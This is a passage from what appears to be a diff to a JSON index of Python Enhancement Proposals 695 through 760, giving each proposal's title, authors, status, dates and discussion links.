"https://discuss.python.org/t/pep-695-type-parameter-syntax/21646/92", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0695/" + }, + "696": { + "number": 696, + "title": "Type Defaults for Type Parameters", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Jul-2022", + "python_version": "3.13", + "post_history": "`22-Mar-2022 `__, `08-Jan-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569/34", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0696/" + }, + "697": { + "number": 697, + "title": "Limited C API for Extending Opaque Types", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/19743", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2022", + "python_version": "3.12", + "post_history": "`24-May-2022 `__, `06-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19743/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0697/" + }, + "698": { + "number": 698, + "title": "Override Decorator for Static Typing", + "authors": "Steven Troxler, Joshua Xu, Shannon Zhu", + "discussions_to": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Sep-2022", + "python_version": "3.12", + "post_history": "`20-May-2022 `__, `17-Aug-2022 `__, `11-Oct-2022 `__, `07-Nov-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839/11", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0698/" + }, + "699": { + "number": 699, + "title": "Remove private dict version field added in PEP 509", + "authors": "Ken Jin", + "discussions_to": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "03-Oct-2022", + "python_version": "3.12", + "post_history": "`05-Oct-2022 `__", + "resolution": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724/13", + "requires": null, + "replaces": "509", + "superseded_by": null, + "url": "https://peps.python.org/pep-0699/" + }, + "700": { + "number": 700, + "title": "Additional Fields for the Simple API for Package Indexes", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-700-additional-fields-for-the-simple-api-for-package-indexes/20177", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Oct-2022", + "python_version": null, + "post_history": "`21-Oct-2022 `__", + "resolution": "`19-Dec-2022 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0700/" + }, + "701": { + "number": 701, + "title": "Syntactic formalization of f-strings", + "authors": "Pablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta G\u00f3mez Mac\u00edas", + "discussions_to": "https://discuss.python.org/t/pep-701-syntactic-formalization-of-f-strings/22046", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2022", + "python_version": 
"3.12", + "post_history": "`19-Dec-2022 `__,", + "resolution": "`14-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0701/" + }, + "702": { + "number": 702, + "title": "Marking deprecations using the type system", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-702-marking-deprecations-using-the-type-system/23036", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Dec-2022", + "python_version": "3.13", + "post_history": "`01-Jan-2023 `__, `22-Jan-2023 `__", + "resolution": "`07-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0702/" + }, + "703": { + "number": 703, + "title": "Making the Global Interpreter Lock Optional in CPython", + "authors": "Sam Gross", + "discussions_to": "https://discuss.python.org/t/22606", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "09-Jan-2023", + "python_version": "3.13", + "post_history": "`09-Jan-2023 `__, `04-May-2023 `__", + "resolution": "`24-Oct-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0703/" + }, + "704": { + "number": 704, + "title": "Require virtual environments by default for package installers", + "authors": "Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/22846", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jan-2023", + "python_version": null, + "post_history": "`16-Jan-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0704/" + }, + "705": { + "number": 705, + "title": "TypedDict: Read-only items", + "authors": "Alice Purcell", + "discussions_to": "https://discuss.python.org/t/pep-705-read-only-typeddict-items/37867", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Nov-2022", + "python_version": "3.13", + "post_history": "`30-Sep-2022 `__, `02-Nov-2022 `__, `14-Mar-2023 `__, `17-Oct-2023 `__, `04-Nov-2023 `__,", + "resolution": "`29-Feb-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0705/" + }, + "706": { + "number": 706, + "title": "Filter for tarfile.extractall", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/23903", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Jan-2023 `__, `15-Feb-2023 `__,", + "resolution": "https://discuss.python.org/t/23903/10", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0706/" + }, + "707": { + "number": 707, + "title": "A simplified signature for __exit__ and __aexit__", + "authors": "Irit Katriel", + "discussions_to": "https://discuss.python.org/t/24402", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Feb-2023", + "python_version": "3.12", + "post_history": "`02-Mar-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-707-a-simplified-signature-for-exit-and-aexit/24402/46", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0707/" + }, + "708": { + "number": 708, + "title": "Extending the Repository API to Mitigate Dependency Confusion Attacks", + "authors": 
"Donald Stufft", + "discussions_to": "https://discuss.python.org/t/24179", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Feb-2023", + "python_version": null, + "post_history": "`01-Feb-2023 `__, `23-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/24179/72", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0708/" + }, + "709": { + "number": 709, + "title": "Inlined comprehensions", + "authors": "Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240/36", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0709/" + }, + "710": { + "number": 710, + "title": "Recording the provenance of installed packages", + "authors": "Fridol\u00edn Pokorn\u00fd", + "discussions_to": "https://discuss.python.org/t/pep-710-recording-the-provenance-of-installed-packages/25428", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Mar-2023", + "python_version": null, + "post_history": "`03-Dec-2021 `__, `30-Jan-2023 `__, `14-Mar-2023 `__, `03-Apr-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0710/" + }, + "711": { + "number": 711, + "title": "PyBI: a standard format for distributing Python Binaries", + "authors": "Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/pep-711-pybi-a-standard-format-for-distributing-python-binaries/25547", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Apr-2023", + "python_version": null, + "post_history": "`06-Apr-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0711/" + }, + "712": { + "number": 712, + "title": "Adding a \"converter\" parameter to dataclasses.field", + "authors": "Joshua Cannon", + "discussions_to": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2023", + "python_version": "3.13", + "post_history": "`27-Dec-2022 `__, `19-Jan-2023 `__, `23-Apr-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126/98", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0712/" + }, + "713": { + "number": 713, + "title": "Callable Modules", + "authors": "Amethyst Reese", + "discussions_to": "https://discuss.python.org/t/pep-713-callable-modules/26127", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Apr-2023", + "python_version": "3.12", + "post_history": "`23-Apr-2023 `__", + "resolution": "https://discuss.python.org/t/26127/86", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0713/" + }, + "714": { + "number": 714, + "title": "Rename dist-info-metadata in the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/27471", + "status": "Accepted", + "type": "Standards Track", + 
"topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`06-Jun-2023 `__", + "resolution": "`27-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0714/" + }, + "715": { + "number": 715, + "title": "Disabling bdist_egg distribution uploads on PyPI", + "authors": "William Woodruff", + "discussions_to": "https://discuss.python.org/t/27610", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`09-Jun-2023 `__", + "resolution": "`24-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0715/" + }, + "718": { + "number": 718, + "title": "Subscriptable functions", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/28457/", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "23-Jun-2023", + "python_version": "3.13", + "post_history": "`24-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0718/" + }, + "719": { + "number": 719, + "title": "Python 3.13 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "26-May-2023", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0719/" + }, + "720": { + "number": 720, + "title": "Cross-compiling Python packages", + "authors": "Filipe La\u00edns", + "discussions_to": null, + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "01-Jul-2023", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0720/" + }, + "721": { + "number": 721, + "title": "Using tarfile.data_filter for source distribution extraction", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2023", + "python_version": "3.12", + "post_history": "`04-Jul-2023 `__,", + "resolution": "`02-Aug-2023 `__", + "requires": "706", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0721/" + }, + "722": { + "number": 722, + "title": "Dependency specification for single-file scripts", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/29905", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Jul-2023", + "python_version": null, + "post_history": "`19-Jul-2023 `__", + "resolution": "https://discuss.python.org/t/pep-722-723-decision/36763/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0722/" + }, + "723": { + "number": 723, + "title": "Inline script metadata", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/31151", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Aug-2023", + "python_version": null, + "post_history": "`04-Aug-2023 `__, `06-Aug-2023 `__, `23-Aug-2023 `__, `06-Dec-2023 `__,", + "resolution": "`08-Jan-2024 `__", + "requires": null, + "replaces": "722", + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0723/" + }, + "724": { + "number": 724, + "title": "Stricter Type Guards", + "authors": "Rich Chiodo, Eric Traut, Erik De Bonte", + "discussions_to": "https://discuss.python.org/t/pep-724-stricter-type-guards/34124", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "typing", + "created": "28-Jul-2023", + "python_version": "3.13", + "post_history": "`30-Dec-2021 `__, `19-Sep-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0724/" + }, + "725": { + "number": 725, + "title": "Specifying external dependencies in pyproject.toml", + "authors": "Pradyun Gedam, Ralf Gommers", + "discussions_to": "https://discuss.python.org/t/31888", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Aug-2023", + "python_version": null, + "post_history": "`18-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0725/" + }, + "726": { + "number": 726, + "title": "Module ``__setattr__`` and ``__delattr__``", + "authors": "Sergey B Kirpichev", + "discussions_to": "https://discuss.python.org/t/32640/", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2023", + "python_version": "3.13", + "post_history": "`06-Apr-2023 `__, `31-Aug-2023 `__,", + "resolution": "https://discuss.python.org/t/32640/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0726/" + }, + "727": { + "number": 727, + "title": "Documentation in Annotated Metadata", + "authors": "Sebasti\u00e1n Ram\u00edrez", + "discussions_to": "https://discuss.python.org/t/32566", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2023", + "python_version": "3.13", + "post_history": "`30-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0727/" + }, + "728": { + "number": 728, + "title": "TypedDict with Typed Extra Items", + "authors": "Zixuan James Li", + "discussions_to": "https://discuss.python.org/t/pep-728-typeddict-with-typed-extra-items/45443", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "12-Sep-2023", + "python_version": "3.14", + "post_history": "`09-Feb-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0728/" + }, + "729": { + "number": 729, + "title": "Typing governance process", + "authors": "Jelle Zijlstra, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/pep-729-typing-governance-process/35362", + "status": "Active", + "type": "Process", + "topic": "governance, typing", + "created": "19-Sep-2023", + "python_version": null, + "post_history": "`04-Oct-2023 `__, `20-Sep-2023 `__", + "resolution": "`20-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0729/" + }, + "730": { + "number": 730, + "title": "Adding iOS as a supported platform", + "authors": "Russell Keith-Magee", + "discussions_to": "https://discuss.python.org/t/pep730-adding-ios-as-a-supported-platform/35854", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Oct-2023", + "python_version": "3.13", + "post_history": null, + "resolution": 
"https://discuss.python.org/t/pep-730-adding-ios-as-a-supported-platform/35854/66", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0730/" + }, + "731": { + "number": 731, + "title": "C API Working Group Charter", + "authors": "Guido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel", + "discussions_to": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "11-Oct-2023", + "python_version": null, + "post_history": "`13-Oct-2023 `__, `23-May-2024 `__, `19-Jun-2024 `__", + "resolution": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117/12", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0731/" + }, + "732": { + "number": 732, + "title": "The Python Documentation Editorial Board", + "authors": "Joanna Jablonski", + "discussions_to": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "14-Oct-2023", + "python_version": null, + "post_history": "`20-Oct-2023 `__", + "resolution": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0732/" + }, + "733": { + "number": 733, + "title": "An Evaluation of Python's Public C API", + "authors": "Erlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. 
Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "16-Oct-2023", + "python_version": null, + "post_history": "01-Nov-2023", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0733/" + }, + "734": { + "number": 734, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Nov-2023", + "python_version": "3.13", + "post_history": "14-Dec-2023", + "resolution": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147/24", + "requires": null, + "replaces": "554", + "superseded_by": null, + "url": "https://peps.python.org/pep-0734/" + }, + "735": { + "number": 735, + "title": "Dependency Groups in pyproject.toml", + "authors": "Stephen Rosen", + "discussions_to": "https://discuss.python.org/t/39233", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Nov-2023", + "python_version": null, + "post_history": "14-Nov-2023, 20-Nov-2023", + "resolution": "10-Oct-2024", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0735/" + }, + "736": { + "number": 736, + "title": "Shorthand syntax for keyword arguments at invocation", + "authors": "Joshua Bambrick, Chris Angelico", + "discussions_to": "https://discuss.python.org/t/pep-736-keyword-argument-shorthand-final-draft/58504", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2023", + "python_version": "3.14", + "post_history": "14-Oct-2023, 17-Jan-2024, 17-Jul-2024", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0736/" + }, + "737": { + "number": 737, + "title": "C API to format a type fully qualified name", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Nov-2023", + "python_version": "3.13", + "post_history": "29-Nov-2023", + "resolution": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872/60", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0737/" + }, + "738": { + "number": 738, + "title": "Adding Android as a supported platform", + "authors": "Malcolm Smith", + "discussions_to": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2023", + "python_version": "3.13", + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975/23", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0738/" + }, + "739": { + "number": 739, + "title": "Static description file for build details of Python installations", + "authors": "Filipe La\u00edns", + "discussions_to": "https://discuss.python.org/t/pep-739-static-description-file-for-build-details-of-python-installations/44572", + 
"status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Dec-2023", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0739/" + }, + "740": { + "number": 740, + "title": "Index support for digital attestations", + "authors": "William Woodruff, Facundo Tuesca, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-740-index-support-for-digital-attestations/44498", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jan-2024", + "python_version": null, + "post_history": "`02-Jan-2024 `__, `29-Jan-2024 `__", + "resolution": "`17-Jul-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0740/" + }, + "741": { + "number": 741, + "title": "Python Configuration C API", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2024", + "python_version": "3.14", + "post_history": "`19-Jan-2024 `__, `08-Feb-2024 `__,", + "resolution": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403/88", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0741/" + }, + "742": { + "number": 742, + "title": "Narrowing types with TypeIs", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-742-narrowing-types-with-typenarrower/45613", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Feb-2024", + "python_version": "3.13", + "post_history": "`11-Feb-2024 `__", + "resolution": "`03-Apr-2024 `__", + "requires": null, + "replaces": "724", + "superseded_by": null, + "url": "https://peps.python.org/pep-0742/" + }, + "743": { + "number": 743, + "title": "Add Py_COMPAT_API_VERSION to the Python C API", + "authors": "Victor Stinner, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-743-add-py-compat-api-version-to-the-python-c-api-take-2/59323", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0743/" + }, + "744": { + "number": 744, + "title": "JIT Compilation", + "authors": "Brandt Bucher, Savannah Ostrowski", + "discussions_to": "https://discuss.python.org/t/pep-744-jit-compilation/50756", + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "11-Apr-2024", + "python_version": "3.13", + "post_history": "`11-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0744/" + }, + "745": { + "number": 745, + "title": "Python 3.14 Release Schedule", + "authors": "Hugo van Kemenade", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-Apr-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0745/" + }, + "746": { + "number": 746, + "title": "Type checking Annotated metadata", + "authors": "Adrian Garcia Badaracco", + 
"discussions_to": "https://discuss.python.org/t/pep-746-typedmetadata-for-type-checking-of-pep-593-annotated/53834", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "20-May-2024", + "python_version": "3.14", + "post_history": "20-May-2024", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0746/" + }, + "747": { + "number": 747, + "title": "Annotating Type Forms", + "authors": "David Foster, Eric Traut", + "discussions_to": "https://discuss.python.org/t/pep-747-typeexpr-type-hint-for-a-type-expression/55984", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "27-May-2024", + "python_version": "3.14", + "post_history": "`19-Apr-2024 `__, `04-May-2024 `__, `17-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0747/" + }, + "748": { + "number": 748, + "title": "A Unified TLS API for Python", + "authors": "Joop van de Pol, William Woodruff", + "discussions_to": "https://discuss.python.org/t/pre-pep-discussion-revival-of-pep-543/51263", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2024", + "python_version": "3.14", + "post_history": "`17-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": "543", + "superseded_by": null, + "url": "https://peps.python.org/pep-0748/" + }, + "749": { + "number": 749, + "title": "Implementing PEP 649", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-749-implementing-pep-649/54974", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-May-2024", + "python_version": "3.14", + "post_history": "`04-Jun-2024 `__", + "resolution": null, + "requires": "649", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0749/" + }, + "750": { + "number": 750, + "title": "Template Strings", + "authors": "Jim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck", + "discussions_to": "https://discuss.python.org/t/pep-750-tag-strings-for-writing-domain-specific-languages/60408", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "08-Jul-2024", + "python_version": "3.14", + "post_history": "`09-Aug-2024 `__, `17-Oct-2024 `__, `21-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0750/" + }, + "751": { + "number": 751, + "title": "A file format to record Python dependencies for installation reproducibility", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Jul-2024", + "python_version": null, + "post_history": "`25-Jul-2024 `__ `30-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": "665", + "superseded_by": null, + "url": "https://peps.python.org/pep-0751/" + }, + "752": { + "number": 752, + "title": "Implicit namespaces for package repositories", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63192", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Aug-2024", + "python_version": null, + "post_history": "`18-Aug-2024 `__, `07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0752/" + 
}, + "753": { + "number": 753, + "title": "Uniform project URLs in core metadata", + "authors": "William Woodruff, Facundo Tuesca", + "discussions_to": "https://discuss.python.org/t/pep-753-uniform-urls-in-core-metadata/62792", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Aug-2024", + "python_version": null, + "post_history": "`26-Aug-2024 `__, `03-Sep-2024 `__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0753/" + }, + "754": { + "number": 754, + "title": "IEEE 754 Floating Point Special Values", + "authors": "Gregory R. Warnes", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Mar-2003", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0754/" + }, + "755": { + "number": 755, + "title": "Implicit namespace policy for PyPI", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63191", + "status": "Draft", + "type": "Process", + "topic": "packaging", + "created": "05-Sep-2024", + "python_version": null, + "post_history": "`07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0755/" + }, + "756": { + "number": 756, + "title": "Add PyUnicode_Export() and PyUnicode_Import() C functions", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63891", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`29-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0756/" + }, + "757": { + "number": 757, + "title": "C API to import-export Python integers", + "authors": "Sergey B Kirpichev, Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63895", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`08-Dec-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0757/" + }, + "758": { + "number": 758, + "title": "Allow ``except`` and ``except*`` expressions without parentheses", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Sep-2024", + "python_version": "3.14", + "post_history": "`02-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0758/" + }, + "759": { + "number": 759, + "title": "External Wheel Hosting", + "authors": "Barry Warsaw, Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-759-external-wheel-hosting/66458", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0759/" + }, + "760": { + "number": 760, + "title": "No More Bare Excepts", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": 
